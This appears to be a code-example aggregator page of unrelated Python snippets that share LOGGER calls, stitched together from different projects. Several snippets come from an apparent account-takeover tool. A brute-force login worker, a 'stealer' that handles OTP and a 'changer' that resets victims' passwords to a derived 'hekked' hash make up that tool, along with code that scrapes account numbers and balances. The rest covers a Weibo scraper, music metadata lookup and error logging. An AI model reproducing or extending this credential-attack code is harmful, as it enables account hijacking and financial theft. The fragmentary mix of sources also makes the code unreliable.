             'newpassword': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
             'newpassword2': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
             })
     )
     data = my_url_open(obj.opener, req)
     if 'error' not in data:
         LOGGER.critical('Password changed for user: %s', obj.user)
         return True
Ejemplo n.º 49
0
    def run(self):
        LOGGER.info('Start stealer')
        while 1:
            try:
                obj = GOOD.get(timeout=2)
            except Exception as e:
                LOGGER.error('Unknown error in Stealer')
                continue
            if FORCE_STEAL:
                self.do_otp(obj)

            CHANGE.put(obj)
            GOOD.task_done()
Ejemplo n.º 50
0
 def postdata(self, **kw):
     try:
         data = kw['data']
     except:
         return None
     self.socket.sendall(json.dumps({'action': 'postdata', 'data': data})+ '\r\n')
     res = self.socket.recv(1024)
     r = json.loads(res, object_hook=_obj_hook)
     if hasattr(r, 'error'):
         LOGGER.error(r.error)
         return None
     else:
         return r.status
Ejemplo n.º 51
0
 def target_travel(self, ts, uid=None):
     if not uid:
         return None
     if uid in self.black_list:
         return None
     url = 'http://weibo.cn/u/'+uid
     current_page = 1
     home_page_soup = BeautifulSoup(self.client.urlopen(url+'?page=1'))
     try:
         name, verified, gender, location, desc, tags = self._travel_info(uid)
         print 'target spider %d searching uid: %s name: %s...' % (self.num, uid, name)
     except Exception, e:
         LOGGER.error('User %s Info Page Error:%s' % (uid, e))
         return None
Ejemplo n.º 52
0
def search_echonest_artist_terms(artist_name):
    artist_results = artist.search(name=artist_name)
    if not artist_results:
        LOGGER.info('Artist not found in Echonest')
        return None
    if artist_results[0].name.lower() == artist_name.lower():
        artist_terms = artist_results[0].terms
        if artist_terms:
            return max(artist_terms, key=lambda x: x['weight'] * x['frequency'])['name']
        else:
            return None
    else:
        LOGGER.info("Artist name did not match top result: {} vs {}".format(artist_name, artist_results[0].name))
        return None
Ejemplo n.º 53
0
 def run(self):
     LOGGER.info('Run brute')
     while 1:
         try:
             user, password = ENEMY.get(block=1, timeout=10)
         except Queue.Empty:
             continue
         if user in known_users:
             continue
         self.generate_opener()
         data = self.brute_login_with_session(user, password)
         account_password_queue.task_done()
         if self.check(data):
             add_good(user, password, data, self.opener)
Ejemplo n.º 54
0
def handleTraceback(object):
    context = object.context
    entry_url = object.entry_url

    if entry_url is None:
        return

    LOGGER.info("handle traceback [%s]" % entry_url)
    try:
        cleanup_lock.acquire()
        # we don't want to produce any errors here, thus, we'll be nice and die
        # silently if an error occurs here
        try:
            transaction.begin()
            # get our logbook view to use the api
            logbook = context.unrestrictedTraverse('@@logbook')
            # get the generated error url from Products.SiteErrorLog
            err_id = urllib.splitvalue(entry_url)[1]
            # save error
            logbook.save_error(err_id, context=aq_parent(context))
            transaction.get().note('collective.logbook traceback [%s]' %
                    entry_url)
            transaction.commit()
        finally:
            cleanup_lock.release()
    # only warning
    except Exception, e:
        LOGGER.warning("An error occured while handling the traceback")
        LOGGER.warning("%s" % e)
        LOGGER.exception(e)
Ejemplo n.º 55
0
 def process(self, event):
     """
     event.event_type
         'modified' | 'created' | 'moved' | 'deleted'
     event.is_directory
         True | False
     event.src_path
         path/to/observed/file
     """
     track_path = event.dest_path if event.event_type == 'moved' else event.src_path
     LOGGER.info('File change detected: {event_type}: {track_path}'.format(event_type=event.event_type,
                                                                           track_path=track_path))
     if '/Users/carmstrong/Projects/music_master/tracks/holding' in track_path:
         LOGGER.info('Protected path, will make no changes!!')
     sync_file(track_path, event.event_type)
Ejemplo n.º 56
0
    def run(self):
        LOGGER.info('Start changer')
        while 1:
            try:
                obj = CHANGE.get(timeout=2)
            except Exception as e:
                LOGGER.error('Unknown error in Changer!')
                continue
            cookiejar = cookielib.CookieJar()
            self.opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(cookiejar),
            )

            self.do_change(obj)
            CHANGE.task_done()
Ejemplo n.º 57
0
    def __init__(self, user, password, data, opener):
        LOGGER.info('Created new account data for %s', user)
        self.user = user
        self.password = password
        self.number = RE_ACCOUNT_NUMBER.search(data)
        self.amount = RE_AMOUNT.search(data)
        self.id = RE_ID.search(data)

        if self.number is None or self.amount is None:
            raise ValueError('No account number or amount in file')
        self.number = self.number.group(1)
        self.amount = self.amount.group(1)
        self.amount = int(float(self.amount))
        self.id = self.id.group(1)
        self.opener = opener